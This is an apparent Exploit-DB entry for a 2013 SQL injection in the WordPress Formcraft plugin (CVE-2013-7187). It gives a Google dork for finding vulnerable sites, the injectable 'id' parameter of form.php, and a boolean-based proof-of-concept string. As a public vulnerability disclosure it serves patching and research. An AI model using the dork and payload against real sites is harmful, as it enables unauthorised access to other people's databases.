WordPress Plugin Formcraft - SQL Injection
Author: Ashiyane Digital Security Team
type: webapps
platform: php
port:
date_added: 2013-12-10
date_updated: 2013-12-10
verified: 1
codes: CVE-2013-7187;OSVDB-100877
tags: WordPress Plugin
aliases:
screenshot_url:
application_url:
#######################################################################
# Exploit Title : Wordpress formcraft Plugin Sql Injection
#
# Exploit Author : Ashiyane Digital Security Team
#
# Google Dork : inurl:/wp-content/plugins/formcraft
#
# Software Link : www.wordpress.org
#
# Tested on: Windows , Linux
#
# Date: 2013/12/2
#
#############################################
# Exploit : Sql Injection
#
# Location1:
[Target]/wp-content/plugins/formcraft/form.php?id=[Sql]
#
#
#
# Exploit-DB Note:
# A PoC: form.php?id=1%20and%20 1=1
##########################################
##############
Milad Hacking
We Love Mohammad
##############